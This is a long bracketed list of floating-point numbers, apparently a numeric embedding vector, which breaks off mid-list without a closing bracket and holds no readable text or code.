[ -0.008265893906354904, 0.02993040904402733, -0.021837705746293068, 0.010202474892139435, -0.025301508605480194, 0.028607865795493126, 0.0007547548739239573, 0.021664515137672424, -0.049878768622875214, 0.03564568608999252, 0.015524136833846569, 0.017775608226656914, 0.02342790551483631, 0.009627798572182655, -0.031394653022289276, -0.0018608102109283209, 0.01791730895638466, 0.027253834530711174, -0.020562395453453064, 0.00010233963985228911, 0.046477943658828735, -0.006376546807587147, 0.0007596750510856509, 0.02851339802145958, 0.0011109755141660571, 0.008824826218187809, -0.04521837830543518, 0.029237648472189903, -0.011123531498014927, -0.029552539810538292, 0.011650974862277508, 0.004451774526387453, -0.017775608226656914, 0.012044589035212994, 0.04301413893699646, 0.005656233057379723, 0.0335044227540493, 0.050445571541786194, 0.0015429669292643666, 0.004199861548841, -0.03155209869146347, -0.025096828117966652, -0.03131593018770218, 0.015303712338209152, -0.027820637449622154, 0.013193941675126553, -0.011934376321732998, 0.01453222893178463, -0.012265012599527836, -0.025836823508143425, 0.021160688251256943, -0.04698176681995392, -0.04216393083333969, -0.015154139138758183, -0.007561325095593929, -0.017744120210409164, 0.049028560519218445, -0.026419371366500854, -0.0033004535362124443, 0.023270459845662117, -0.012383096851408482, 0.01810624450445175, 0.010108008049428463, 0.04449412599205971, 0.031725287437438965, -0.015028182417154312, -0.02596277929842472, 0.022262807935476303, -0.02090877667069435, 0.017807098105549812, -0.0005997693515382707, -0.04326605051755905, 0.014437762089073658, 0.03378782793879509, 0.04307711869478226, -0.049910254776477814, 0.07034669816493988, 0.017177315428853035, -0.015138395130634308, 0.03410271927714348, -0.031158484518527985, 0.005782189778983593, -0.03215039148926735, 0.018940705806016922, 0.017130082473158836, -0.016799446195364, -0.0418805293738842, -0.05897912383079529, -0.02933211624622345, 0.010989703238010406, 0.0016708914190530777, 0.00991907250136137, 0.01523286197334528, -0.026057247072458267, 0.0076124947518110275, -0.004695815034210682, 0.021176433190703392, -0.007703026290982962, -0.04405327886343002, -0.038385238498449326, 0.007455049082636833, -0.02736404538154602, 0.026356393471360207, -0.021160688251256943, -0.0027533299289643764, -0.013280536979436874, 0.005144535098224878, -0.0002996386610902846, 0.0039558205753564835, 0.10838555544614792, 0.012587775476276875, 0.022750889882445335, -0.021381113678216934, -0.02204238437116146, 0.00965928751975298, 0.01272160466760397, -0.017948798835277557, -0.03684227168560028, -0.01087161898612976, -0.0013855212600901723, -0.02881254442036152, 0.002245567971840501, -0.04417923465371132, -0.00023420032812282443, -0.030339768156409264, 0.05082343891263008, -0.0009741946705617011, 0.030591679736971855, 0.0019936549942940474, -0.004782410338521004, -0.04524986445903778, -0.002322322688996792, -0.004026671405881643, -0.008620146661996841, 0.005923890974372625, 0.01955474354326725, -0.050445571541786194, 0.017208803445100784, -0.013052240014076233, 0.009328652173280716, -0.04773750528693199, -0.026875963434576988, 0.05485404655337334, 0.003621248761191964, -0.04773750528693199, -0.021160688251256943, 0.002963913371786475, 0.015350946225225925, -0.03413420543074608, -0.027442768216133118, 0.009800989180803299, -0.05479107052087784, 0.0005786126130260527, -0.0019503574585542083, 0.022750889882445335, 0.023270459845662117, -0.00015978269220795482, -0.021617280319333076, -0.014437762089073658, 0.005538149271160364, -0.03200869262218475, -0.006703246384859085, 0.015964984893798828, -0.013870957307517529, -0.0146581856533885, -0.026466606184840202, 0.00949396938085556, 0.025364486500620842, -0.024970872327685356, 0.0167679563164711, -0.027804892510175705, 0.023380672559142113, 0.01955474354326725, 0.007872279733419418, -0.031693801283836365, -0.017744120210409164, 0.010391409508883953, 0.02906445786356926, -0.011107787489891052, -0.006762288510799408, -0.05287023261189461, 0.030670402571558952, 0.023364927619695663, 0.0020133357029408216, 0.009588437154889107, -0.03989671543240547, 0.06921308487653732, -0.012965645641088486, 0.06080549210309982, -0.0060498472303152084, 0.017161570489406586, 0.03722013905644417, 0.01708284765481949, 0.0013619044329971075, 0.06089995801448822, -0.002713968511670828, -0.02512831799685955, -0.024356834590435028, -0.015532008372247219, -0.01146204024553299, 0.01424882747232914, -0.012776711024343967, 0.01587051711976528, -0.02317599207162857, -0.015043927356600761, 0.0069669680669903755, -0.01843688078224659, 0.04417923465371132, 0.01728752627968788, -0.03466952219605446, -0.027773404493927956, -0.03482696786522865, 0.011698207817971706, 0.001579376170411706, 0.008132065646350384, 0.00629782397300005, -0.006864628288894892, -0.010296942666172981, -0.010226092301309109, 0.0026017886120826006, 0.04046351835131645, 0.00823440495878458, 0.028088295832276344, 0.01269798818975687, -0.015516264364123344, 0.01439840067178011, -0.013611172325909138, -0.023664074018597603, -0.011682463809847832, 0.02989891916513443, 0.04632049798965454, 0.0041053942404687405, -0.015327329747378826, 0.008352489210665226, -0.007541644386947155, -0.02487640455365181, 0.012257140129804611, -0.004180180840194225, -0.0030603487975895405, -0.007045690901577473, -0.03438612073659897, 0.05781402438879013, -0.03147337585687637, -0.026986176148056984, -0.006467078346759081, 0.04695027694106102, -0.0014711323892697692, 0.0062033566646277905, -0.02517555095255375, 0.013839468359947205, -0.012068205513060093, -0.034763988107442856, 0.02572661079466343, 0.009840350598096848, -0.002708064392209053, 0.04376987740397453, 0.014878609217703342, -0.013870957307517529, -0.0047036875039339066, -0.05560978502035141, 0.004790282342582941, 0.028009572997689247, -0.023648329079151154, -0.02174323797225952, 0.0024896084796637297, -0.032528262585401535, 0.00717951962724328, -0.04638347402215004, -0.007895897142589092, -0.01848411373794079, 0.006097081117331982, -0.016390087082982063, -0.0307648703455925, 0.023380672559142113, -0.011202254332602024, -0.006781969219446182, 0.008439084514975548, -0.02517555095255375, 0.024750448763370514, 0.019413042813539505, -0.006644204258918762, 0.02818276360630989, 0.0048847496509552, 0.03498441353440285, 0.0003303897683508694, -0.012453947216272354, 0.014988820999860764, 0.016279876232147217, -0.03882608562707901, 0.0013382876059040427, 0.023900242522358894, 0.03403973951935768, -0.026403628289699554, 0.03128444030880928, -0.02035771682858467, 0.00965928751975298, -0.0019021396292373538, 0.02432534471154213, 0.013619044795632362, -0.019428787752985954, -0.00891142152249813, 0.017712630331516266, 0.007325156591832638, -0.006041975226253271, -0.03153635561466217, 0.04084138944745064, -0.03564568608999252, 0.027206599712371826, -0.036684826016426086, -0.017240293323993683, 0.03416569530963898, -0.031992945820093155, -0.0237900298088789, 0.012516925111413002, 0.0025270020123571157, -0.010879491455852985, -0.004636772908270359, -0.02764744870364666, -0.04600560665130615, -0.033095065504312515, 0.01733476109802723, -0.0013008943060413003, -0.041219260543584824, -0.01562647521495819, 0.019901124760508537, -0.030229555442929268, -0.01810624450445175, 0.007419623900204897, -0.005144535098224878, 0.026702774688601494, 0.0015695358160883188, 0.012162672355771065, 0.013485215604305267, 0.00691579794511199, 0.023380672559142113, -0.0474226139485836, -0.010926724411547184, -0.021097710356116295, 0.01867304928600788, -0.008242277428507805, -0.015036054886877537, 0.008840570226311684, 0.015177756547927856, 0.005486979149281979, 0.021979406476020813, -0.01782284304499626, -0.003204018110409379, 0.03407122939825058, 0.03410271927714348, 0.015500519424676895, 0.001143448636867106, 0.00761643098667264, 0.012123310938477516, -0.014146487228572369, 0.0031804011669009924, -0.0013284472515806556, 0.0006199420313350856, -0.022467486560344696, 0.023128759115934372, 0.01565796509385109, 0.015516264364123344, -0.04266775771975517, 0.00684888381510973, 0.028151273727416992, 0.0038495450280606747, 0.007510155439376831, -0.025081085041165352, 0.005640488583594561, -0.009667159989476204, -0.046257518231868744, -0.011706080287694931, 0.0030957742128521204, -0.07746323943138123, 0.019633466377854347, -0.03156784176826477, 0.018515603616833687, 0.014555846340954304, -0.012430330738425255, -0.034197185188531876, 0.012225651182234287, -0.05230342969298363, -0.012217778712511063, 0.029095947742462158, -0.0362439788877964, -0.0195704884827137, 0.023364927619695663, 0.01355606596916914, 0.011501401662826538, -0.03602355346083641, -0.007659728638827801, -0.02265642210841179, 0.035362280905246735, -0.028371697291731834, -0.054066818207502365, -0.03555121645331383, 0.033126555383205414, -0.027033409103751183, -0.006447397638112307, -0.0016590830637142062, 0.008840570226311684, 0.030812105163931847, -0.010037156753242016, 0.024404067546129227, 0.020578140392899513, -0.03482696786522865, -0.0038987467996776104, -0.006707182619720697, 0.007045690901577473, 0.06486758589744568, -0.002645086031407118, -0.002556523075327277, -0.010147369466722012, -0.003987309988588095, -0.027993828058242798, 0.020530907437205315, 0.006262398790568113, -0.01621689647436142, 0.027836382389068604, -0.003125295275822282, 0.03331549093127251, 0.010769279673695564, -0.008982271887362003, -0.008470573462545872, -0.028324464336037636, 0.018216455355286598, 0.03570866212248802, 0.02123941108584404, -0.008769719861447811, 0.06408035755157471, -0.05334256961941719, 0.02845042012631893, -0.04339200630784035, 0.004869005177170038, -0.03942437842488289, 0.014650313183665276, 0.011336083523929119, -0.035330794751644135, -0.016327109187841415, 0.0011877302313223481, 0.016106685623526573, -0.04701325669884682, 0.022262807935476303, -0.005971124395728111, 0.010139496996998787, 0.03492143377661705, -0.025222785770893097, -0.011084170080721378, -0.026135969907045364, -0.002767106518149376, -0.01875177212059498, 0.025018107146024704, 0.030072109773755074, -0.00017368218686897308, 0.031048273667693138, 0.004483263473957777, -0.02489214949309826, 0.007632175460457802, 0.005109109915792942, 0.028544887900352478, -0.03233932703733444, 0.0064946310594677925, 0.0390150211751461, 0.01590200513601303, 0.00921056792140007, 0.02035771682858467, 0.004302200861275196, -0.029835941269993782, -0.021396856755018234, -0.0029717858415097, -0.004195925313979387, 0.003022955497726798, -0.002991466550156474, 0.01986963488161564, -0.00797461997717619, -0.008612274192273617, 0.029788708314299583, -0.012619265355169773, -0.033630382269620895, 0.017460716888308525, -0.03800736740231514, 0.014036275446414948, 0.00352087733335793, -0.011501401662826538, 0.027222344651818275, -0.030276790261268616, -0.004782410338521004, -0.030528701841831207, -0.0016275938833132386, -0.013500960543751717, 0.0030367320869117975, 0.012894795276224613, 0.05132726579904556, 0.03278017416596413, -0.007033882196992636, 0.012792455032467842, -0.002111739246174693, -0.005144535098224878, -0.01733476109802723, 0.03800736740231514, -0.01731901615858078, 0.01021034736186266, 0.014154359698295593, 0.00825802143663168, 0.015185628086328506, 0.03542526066303253, 0.0005077620735391974, -0.008313127793371677, 0.043423496186733246, -0.04556475579738617, -0.002014319645240903, -0.02764744870364666, -0.02405768819153309, -0.011713952757418156, -0.0363384447991848, -0.006427716929465532, -0.011674591340124607, 0.0007626271108165383, -0.004502944182604551, 0.025002362206578255, -0.032496772706508636, -0.03153635561466217, -0.008769719861447811, -0.0048847496509552, -0.004306137096136808, -0.03942437842488289, 0.02177472598850727, -0.010525238700211048, -0.0237900298088789, 0.004983153194189072, -0.008801208809018135, -0.02125515602529049, -0.03602355346083641, -0.003965660929679871, 0.007647919934242964, 0.00601048581302166, 0.0015872485237196088, -0.007525899913161993, 0.04446263983845711, -0.01980665698647499, -0.025569165125489235, -0.024923639371991158, 0.05057152733206749, -0.041219260543584824, -0.0056837862357497215, -0.007144094444811344, 0.006152187008410692, 0.017933053895831108, 0.004290392622351646, -0.023585351184010506, -0.00937588606029749, -0.006069527938961983, 0.002117643365636468, -0.008667380549013615, 0.022798122838139534, 0.013500960543751717, -0.012359479442238808, 0.0005786126130260527, 0.021916428580880165, 0.00012177433382021263, 0.003886938327923417, -0.022766634821891785, 0.0447145514190197, 0.009415247477591038, -0.012249267660081387, 0.006593034602701664, 0.017193060368299484, -0.005050067789852619, 0.01927134208381176, -0.028560632839798927, -0.014579462818801403, 0.0005958331748843193, -0.019129641354084015, 0.01091098040342331, -0.01842113584280014, -0.0068134586326777935, 0.005294108297675848, 0.019948357716202736, -0.0018499857978895307, -0.022861100733280182, -0.021097710356116295, 0.015043927356600761, -0.004983153194189072, -0.00324534741230309, -0.01287117786705494, 0.006502503529191017, -0.005605063401162624, -0.007069307379424572, -0.01213118340820074, -0.04244733601808548, -0.006656012963503599, -0.004502944182604551, 0.012091821990907192, -0.005109109915792942, -0.022719400003552437, 0.016846679151058197, -0.0040089585818350315, -0.022152597084641457, 0.007045690901577473, 0.030009131878614426, -0.011879270896315575, -0.006101016886532307, 0.04896558076143265, -0.005577510688453913, -0.006459205877035856, -0.007860471494495869, -0.020593885332345963, 0.0002291571581736207, -0.012587775476276875, -0.03233932703733444, 0.015004565939307213, -0.017429228872060776, 0.015713071450591087, 0.05623956769704819, -0.015720942988991737, 0.001237916061654687, 0.014949459582567215, 0.016563277691602707, -0.003991246223449707, 0.0015518232248723507, -0.008053342811763287, 0.023097269237041473, -0.030072109773755074, 0.02761595882475376, -0.025537677109241486, 0.028828289359807968, 0.06669395416975021, -0.009501841850578785, -0.007077179849147797, -0.006455269642174244, -0.03296910971403122, -0.043171584606170654, 0.037818435579538345, -0.002721840748563409, -0.017980288714170456, -0.03131593018770218, 0.0167207233607769, -0.0035563025157898664, -0.0017102528363466263, -0.01089523546397686, 0.014311805367469788, 0.020027080550789833, -0.01903517358005047, -0.01980665698647499, 0.046824321150779724, -0.021916428580880165, 0.00481783552095294, 0.015224989503622055, -0.015697326511144638, -0.00019926708773709834, -0.0030544446781277657, -0.023821519687771797, -0.03278017416596413, -0.005050067789852619, 0.019680701196193695, 0.008368234150111675, -0.02040494978427887, 0.006337185390293598, 0.02989891916513443, 0.005136662628501654, -0.03599206358194351, 0.008376105688512325, -0.002467959886416793, 0.004624964669346809, -0.0334729366004467, 0.014130743220448494, 0.02621469274163246, 0.028844034299254417, -0.014697547070682049, -0.030812105163931847, 0.012666498310863972, 0.0011090075131505728, -0.0032729003578424454, 0.014162232168018818, -0.03100103884935379, -0.018531346693634987, -0.007207072339951992, -0.008722485974431038, 0.004821771755814552, 0.004005022346973419, -0.02205812931060791, -0.00863589160144329, -0.020546650514006615, -0.010100135579705238, 0.0019936549942940474, 0.00008634907135274261, 0.02684447541832924, -0.0010411090916022658, -0.01897219568490982, 0.010399281978607178, -0.020562395453453064, 0.020625373348593712, 0.006616651546210051, 0.01480775885283947, 0.04610007256269455, -0.03403973951935768, -0.010548855178058147, 0.0045974114909768105, 0.010391409508883953, -0.004012894816696644, -0.011619485914707184, -0.0293636042624712, 0.0003343258867971599, 0.016083069145679474, -0.010824385099112988, -0.009714393876492977, -0.000015367859305115417, -0.0002762678195722401, -0.00007829228707123548, -0.013367131352424622, 0.03334697708487511, 0.01563434861600399, -0.003664546413347125, 0.001966102048754692, 0.026340648531913757, -0.020798563957214355, 0.003099710214883089, 0.003715716302394867, -0.003296517301350832, -0.048146866261959076, 0.01146991178393364, 0.0014740844490006566, -0.0018480177968740463, -0.01548477541655302, -0.0071047330275177956, 0.0005963252042420208, 0.018247945234179497, 0.02874956652522087, 0.017177315428853035, 0.02265642210841179, 0.006990584544837475, -0.001374696963466704, -0.04074692353606224, 0.05186258256435394, 0.009627798572182655, -0.020515162497758865, -0.006896117236465216, -0.005109109915792942, -0.010997575707733631, 0.030812105163931847, -0.0017427259590476751, -0.00592782674357295, 0.028072550892829895, -0.061876121908426285, -0.009037377312779427, -0.006644204258918762, -0.002914711833000183, 0.007746323477476835, 0.013044368475675583, -0.014689674600958824, 0.0062860157340765, 0.01958623342216015, 0.002956041134893894, -0.007710898295044899, -0.042352866381406784, -0.005691658705472946, 0.013745001517236233, 0.004695815034210682, -0.0050540040247142315, 0.01059608906507492, -0.006431652698665857, 0.0015567434020340443, -0.019696444272994995, -0.005731020122766495, -0.0002414575865259394, -0.0009190887212753296, -0.013792234472930431, -0.00676622474566102, 0.00587272085249424, 0.01412287075072527, -0.028151273727416992, -0.0181692223995924, -0.012367351911962032, 0.004841452464461327, -0.026655539870262146, 0.011564379557967186, -0.02007431350648403, -0.022845357656478882, -0.0025171616580337286, -0.015697326511144638, -0.003662578295916319, -0.0391409769654274, -0.005494851619005203, -0.0836980789899826, 0.009533330798149109, 0.022121107205748558, -0.03835374861955643, 0.03155209869146347, -0.005620807874947786, -0.023679818958044052, 0.003127263393253088, 0.017728375270962715, -0.011910759843885899, 0.018799005076289177, -0.012343735434114933, 0.030560191720724106, -0.006785905454307795, 0.015398180112242699, 0.017460716888308525, 0.0014061860274523497, 0.019901124760508537, -0.008092704229056835, 0.015256478451192379, -0.006506439298391342, -0.04559624567627907, 0.018846238031983376, 0.005731020122766495, -0.025270018726587296, 0.006581226363778114, -0.03473249822854996, 0.0475170835852623, -0.025616399943828583, 0.008470573462545872, 0.028355952352285385, -0.004951664246618748, 0.023931732401251793, 0.006345057860016823, 0.03454356640577316, -0.01958623342216015, -0.018578581511974335, 0.011273104697465897, -0.04222691059112549, 0.02434108965098858, -0.001350096077658236, -0.024199388921260834, 0.007840790785849094, -0.007360581774264574, -0.021050477400422096, 0.0002077543904306367, 0.0068292031064629555, 0.002647054148837924, -0.016657745465636253, -0.0020900904200971127, -0.016153918579220772, -0.009808860719203949, -0.05954592674970627, 0.0146581856533885, 0.02399471029639244, -0.010399281978607178, -0.01927134208381176, 0.010643322952091694, -0.0362439788877964, -0.013170324265956879, -0.043675411492586136, -0.03410271927714348, -0.0009781308472156525, 0.007128349505364895, -0.010674811899662018, -0.025632144883275032, -0.017161570489406586, 0.021837705746293068, 0.02652958407998085, -0.003666514530777931, 0.009942689910531044, 0.01701986975967884, 0.008124193176627159, 0.002286897273734212, -0.033661868423223495, 0.01845262385904789, 0.010013540275394917, -0.023065781220793724, 0.025805333629250526, 0.009273545816540718, -0.015752432867884636, 0.004534433130174875, 0.011249488219618797, -0.02963126264512539, 0.013201814144849777, -0.027442768216133118, -0.003152848221361637, 0.01059608906507492, -0.03495292365550995, -0.020971754565835, -0.0053610228933393955, -0.017649652436375618, -0.039235442876815796, 0.021066222339868546, -0.022247062996029854, -0.013044368475675583, -0.024435557425022125, 0.012091821990907192, -0.012209906242787838, 0.016704978421330452, 0.005935699213296175, -0.003227634821087122, -0.0015242702793329954, -0.013414365239441395, -0.002999338787049055, 0.005152407567948103, -0.0068173944018781185, -0.009714393876492977, 0.01731901615858078, -0.01818496733903885, -0.023002803325653076, -0.007065371610224247, -0.018861982971429825, 0.0391724668443203, -0.02764744870364666, -0.02287684567272663, -0.0069551593624055386, -0.014209466055035591, -0.02015303634107113, -0.022546209394931793, 0.018043266609311104, -0.009305034764111042, -0.011753314174711704, -0.01590987853705883, 0.013083729892969131, -0.0018391615012660623, 0.01845262385904789, 0.028434675186872482, -0.015516264364123344, 0.003698003478348255, -0.007061435375362635, -0.019365809857845306, -0.03018232248723507, -0.016059450805187225, -0.008840570226311684, 0.005569638218730688, 0.032276347279548645, 0.0530591681599617, -0.025632144883275032, -0.020562395453453064, 0.016657745465636253, 0.03652738034725189, -0.004345498513430357, -0.029253393411636353, -0.0019198523368686438, -0.0076400479301810265, 0.000356466684024781, 0.013437981717288494, 0.009423119015991688, -0.019365809857845306, -0.01594136655330658, 0.008746103383600712, 0.005424000788480043, -0.029835941269993782, 0.0029855621978640556, 0.009643543511629105, 0.00021538067085202783, -0.045722201466560364, -0.0023262586910277605, 0.00019816005078610033, 0.00433762650936842, -0.029772963374853134, -0.002261312445625663, 0.03274868428707123, -0.014941588044166565, 0.00412901071831584, -0.03303208574652672, -0.028891267254948616, 0.00893503800034523, -0.006270271260291338, -0.03608653321862221, -0.03457505255937576, -0.004589539486914873, 0.0146581856533885, -0.034228675067424774, -0.021160688251256943, -0.004987089429050684, 0.030040621757507324, -0.026718519628047943, 0.03986522555351257, -0.006053783465176821, -0.008486318401992321, -0.009265673346817493, 0.03100103884935379, -0.0335674025118351, 0.026183202862739563, -0.003450026735663414, -0.01848411373794079, -0.0031705608125776052, -0.011690336279571056, -0.0334729366004467, 0.023113014176487923, 0.00496740872040391, 0.021081965416669846, -0.004282520618289709, -0.009793116711080074, -0.022262807935476303, -0.01380797941237688, -0.0006504471530206501, -0.045438800007104874, 0.0020605693571269512, -0.0021392921917140484, 0.013563938438892365, -0.0011916663497686386, -0.001879506860859692, 0.007789621129631996, -0.012044589035212994, -0.003194177756085992, 0.0027572661638259888, 0.007868343964219093, 0.0223730206489563, -0.01870453730225563, 0.0643952488899231, -0.006640268489718437, 0.029694240540266037, -0.007710898295044899, -0.0015980728203430772, -0.03567717224359512, -0.042573291808366776, 0.0008260973845608532, -0.02878105640411377, 0.019476020708680153, -0.0056995307095348835, 0.018247945234179497, -0.006191548425704241, -0.026655539870262146, -0.037849921733140945, -0.005620807874947786, -0.022231319919228554, -0.03797587752342224, 0.009391630068421364, 0.0036586422938853502, -0.03482696786522865, 0.004963472485542297, 0.014209466055035591, -0.01548477541655302, -0.00517208781093359, 0.041250746697187424, -0.010462259873747826, 0.016295619308948517, 0.00741175189614296, 0.003965660929679871, 0.012162672355771065, 0.016327109187841415, -0.014839247800409794, 0.02347513847053051, 0.017933053895831108, 0.020483672618865967, 0.015350946225225925, 0.016358597204089165, -0.010178858414292336, -0.0025053531862795353, 0.0013628884917125106, -0.008588657714426517, -0.008431212045252323, -0.03426016494631767, -0.012745221145451069, 0.021617280319333076, 0.028985735028982162, -0.00599867757409811, -0.02930062636733055, -0.02541171945631504, -0.0045423055998981, -0.018924960866570473, 0.01875177212059498, 0.04701325669884682, -0.011115659959614277, 0.003367367899045348, 0.00012460343714337796, 0.006069527938961983, 0.021601537242531776, -0.015752432867884636, -0.013067984953522682, -0.010068646632134914, -0.011776930652558804, 0.0009254849283024669, 0.034197185188531876, 0.008124193176627159, 0.004644645377993584, -0.026907453313469887, 0.020011335611343384, -0.022687911987304688, -0.024136411026120186, -0.03128444030880928, -0.013453726656734943, 0.013445854187011719, -0.006533992476761341, -0.000960910168942064, 0.018043266609311104, 0.007632175460457802, -0.007002393249422312, -0.001998575171455741, 0.003825928084552288, 0.0007478666375391185, -0.0027966275811195374, -0.010651195421814919, -0.006726863328367472, -0.016862424090504646, -0.02709638886153698, -0.02287684567272663, 0.03131593018770218, 0.012792455032467842, -0.041786063462495804, 0.00014834327157586813, -0.0007011249545030296, -0.02174323797225952, 0.014689674600958824, -0.010328431613743305, -0.018358157947659492, -0.007132285740226507, -0.0018991875695064664, -0.011808420531451702, -0.03599206358194351, 0.00474698469042778, 0.0015242702793329954, 0.09100355952978134, 0.043171584606170654, -0.020578140392899513, -0.012910539284348488, -0.030245300382375717, -0.006061655469238758, 0.018310923129320145, -0.000798544439021498, 0.017114337533712387, -0.012209906242787838, -0.010989703238010406, 0.010438643395900726, -0.03150486573576927, -0.01763390749692917, -0.010659066960215569, -0.006195484660565853, -0.0018125924980267882, 0.0016767956549301744, 0.005427937023341656, 0.019932612776756287, 0.001281213597394526, 0.016035834327340126, 0.02797808311879635, -0.0016679393593221903, -0.015020310878753662, -0.023632584139704704, -0.001092278864234686, -0.01146991178393364, 0.01591775007545948, 0.004325817804783583, -0.026072992011904716, -0.0027612021658569574, -0.004971344955265522, 0.003357527544721961, 0.0013737129047513008, 0.003064285032451153, 0.011139276437461376, -0.000772959494497627, 0.023097269237041473, -0.018783260136842728, -0.0021629089023917913, -0.026198947802186012, 0.0005412192549556494, -0.009281418286263943, -0.00852567981928587, -0.013863085769116879, 0.022451743483543396, 0.021680260077118874, 0.01395755261182785, -0.022971313446760178, 0.02456151321530342, -0.024104921147227287, 0.004329754039645195, 0.04666687548160553, -0.0057152751833200455, -0.0028379568830132484, -0.017208803445100784, 0.00002624605804157909, -0.011950121261179447, -0.009131845086812973, 0.011399061419069767, 0.004711559507995844, 0.035614196211099625, 0.023853009566664696, 0.015240734443068504, -0.001819480792619288, -0.023018546402454376, 0.01410712581127882, 0.02874956652522087, 0.023364927619695663, 0.004136883188039064, -0.011792675592005253, 0.001718125189654529, 0.002434502588585019, -0.0026942878030240536, 0.03709418326616287, -0.010367793031036854, 0.0034067293163388968, -0.022782377898693085, -0.012233523651957512, 0.0391094870865345, 0.011792675592005253, -0.005246874876320362, -0.011304594576358795, -0.0074865384958684444, 0.009525459259748459, 0.004561986308544874, 0.008864187635481358, 0.003534653689712286, -0.011926504783332348, -0.004058160353451967, 0.015366691164672375, 0.01842113584280014, 0.0007134253974072635, -0.013312025927007198, -0.01846836879849434, 0.0063253771513700485, -0.010722045786678791, -0.010706300847232342, 0.008887804113328457, 0.010729918256402016, 0.007710898295044899, 0.013036496005952358, 0.0048847496509552, -0.02064111828804016, -0.007435368373990059, 0.012800327502191067, 0.012249267660081387, 0.0008846474811434746, 0.013375003822147846, -0.010375665500760078, -0.012288629077374935, 0.004538369365036488, -0.0362124890089035, 0.0003958280722144991, -0.022498976439237595, -0.013729256577789783, -0.00300524290651083, 0.023128759115934372, -0.027568725869059563, -0.02930062636733055, -0.009848222136497498, 0.012942028231918812, -0.011280977167189121, -0.004806026816368103, -0.026702774688601494, -0.0013560001971200109, -0.009682904928922653, 0.04266775771975517, 0.02007431350648403, 0.020609630271792412, 0.02544320933520794, 0.0118556534871459, -0.017696885392069817, 0.043706897646188736, 0.0036350253503769636, 0.018924960866570473, 0.009997795335948467, 0.023884497582912445, -0.0033949208445847034, -0.000986495055258274, 0.0222942978143692, 0.016972636803984642, 0.05076046288013458, 0.015366691164672375, 0.009273545816540718, 0.011060553602874279, 0.013626917265355587, 0.020861541852355003, 0.024372579529881477, 0.016051579266786575, -0.001162145403213799, 0.01590200513601303, 0.038983531296253204, 0.0023026419803500175, 0.011304594576358795, 0.010501621291041374, -0.02210536226630211, -0.01505967229604721, 0.011769059114158154, -0.014028402976691723, 0.021932171657681465, 0.030040621757507324, -0.011060553602874279, -0.009730137884616852, 0.012375224381685257, -0.016642000526189804, -0.022829612717032433, -0.020341971889138222, -0.007392071187496185, -0.011800548061728477, -0.012013099156320095, -0.019066661596298218, 0.0008359377388842404, 0.01384734082967043, 0.005227194167673588, -0.02427811175584793, 0.0044281575828790665, 0.01755518466234207, -0.01380797941237688, 0.0011946185259148479, -0.019350064918398857, -0.0293478611856699, -0.023065781220793724, 0.04943791776895523, -0.010816512629389763, 0.014075636863708496, 0.007915577851235867, -0.02767893671989441, 0.011414806358516216, 0.016043707728385925, 0.02402619831264019, -0.004345498513430357, -0.006215165369212627, -0.021113455295562744, -0.018373901024460793, 0.019224107265472412, 0.0020103836432099342, -0.0021825896110385656, -0.015791794285178185, -0.015256478451192379, 0.02293982356786728, 0.0021215796004980803, -0.004073904827237129, 0.010981830768287182, -0.004636772908270359, 0.0017751991981640458, 0.007069307379424572, -0.015532008372247219, -0.013075857423245907, -0.00572314765304327, 0.004282520618289709, 0.0010637418599799275, 0.018326668068766594, 0.021853448823094368, -0.00938375759869814, 0.008171427063643932, -0.016610510647296906, 0.0022593443281948566, 0.037566520273685455, -0.01818496733903885, -0.0007296619587577879, -0.009194822981953621, -0.0034047611989080906, -0.014469251036643982, 0.015728816390037537, 0.03929842263460159, -0.00767153687775135, -0.0060341027565300465, 0.008494189940392971, 0.03416569530963898, 0.015697326511144638, 0.011076298542320728, -0.00991120096296072, 0.006238781847059727, 0.003379176137968898, -0.009226311929523945, -0.020027080550789833, 0.0195232555270195, -0.04210095480084419, 0.004380923695862293, -0.01202097162604332, -0.01646880991756916, -0.009966306388378143, -0.03753503039479256, -0.00021661071514245123, 0.00606559170410037, 0.021837705746293068, 0.007703026290982962, 0.018893472850322723, -0.004987089429050684, 0.010415026918053627, 0.016342854127287865, -0.017413483932614326, -0.004506880417466164, 0.020562395453453064, 0.025018107146024704, -0.005522404331713915, 0.029111692681908607, -0.005459426436573267, 0.01213118340820074, 0.004908366594463587, -0.018641559407114983, -0.006730799563229084, -0.02010580338537693, 0.011343955993652344, -0.03684227168560028, 0.005612935870885849, -0.012091821990907192, 0.009179078973829746, -0.0039518848061561584, 0.012461819685995579, 0.006215165369212627, 0.0068449475802481174, -0.02874956652522087, 0.017193060368299484, 0.007620367221534252, -0.01621689647436142, -0.009218440391123295, 0.007695153821259737, 0.014610951766371727, 0.011013319715857506, -0.017492206767201424, -0.020483672618865967, 0.011666718870401382, 0.017130082473158836, -0.01790156587958336, -0.007313348352909088, -0.0018509698566049337, -0.019664956256747246, 0.00012878558482043445, 0.013099473901093006, -0.02459300309419632, -0.015799665823578835, 0.013359259814023972, -0.011643102392554283, -0.030292533338069916, 0.025773845613002777, 0.002956041134893894, -0.0026765752118080854, 0.010722045786678791, 0.0007665632874704897, 0.04414774850010872, 0.022514721378684044, 0.009549075737595558, 0.030371256172657013, -0.012036716565489769, -0.005199640989303589, 0.007888024672865868, 0.008226532489061356, 0.014744780957698822, -0.015831155702471733, -0.0005343310185708106, -0.019696444272994995, -0.012375224381685257, 0.033095065504312515, 0.006541864946484566, 0.004113266244530678, -0.001689588068984449, -0.010218219831585884, 0.014603079296648502, 0.006514311768114567, 0.008407595567405224, -0.02397896535694599, -0.0029068393632769585, -0.013437981717288494, 0.011343955993652344, 0.013217558152973652, 0.00117001764010638, -0.02486066147685051, 0.0024974809493869543, 0.031158484518527985, 0.005506659857928753, 0.007026010192930698, 0.010643322952091694, -0.01706710271537304, -0.0033693357836455107, 0.01523286197334528, -0.009958433918654919, -0.02040494978427887, -0.0063253771513700485, 0.013689895160496235, -0.02210536226630211, 0.013437981717288494, 0.0040089585818350315, 0.018610069528222084, 0.01354819443076849, 0.02287684567272663, -0.02009005844593048, 0.00732909282669425, -0.04216393083333969, -0.013162452727556229, 0.00005756604878115468, 0.0014977012760937214, 0.00530985277146101, 0.03300059959292412, 0.014351166784763336, -0.011816292069852352, 0.004739112686365843, -0.007828982546925545, -0.01783858612179756, 0.00642378069460392, -0.014988820999860764, -0.0038219920825213194, -0.022561954334378242, 0.002280993154272437, -0.014878609217703342, -0.012257140129804611, 0.010659066960215569, 0.0008305255323648453, -0.012186289764940739, -0.004439965821802616, -0.0036704505328089, 0.006226973608136177, -0.00481783552095294, 0.016642000526189804, 0.01790156587958336, -0.019161129370331764, -0.012076077982783318, 0.02342790551483631, 0.02262493222951889, 0.0013697767863050103, -0.005608999636024237, -0.013312025927007198, -0.01706710271537304, 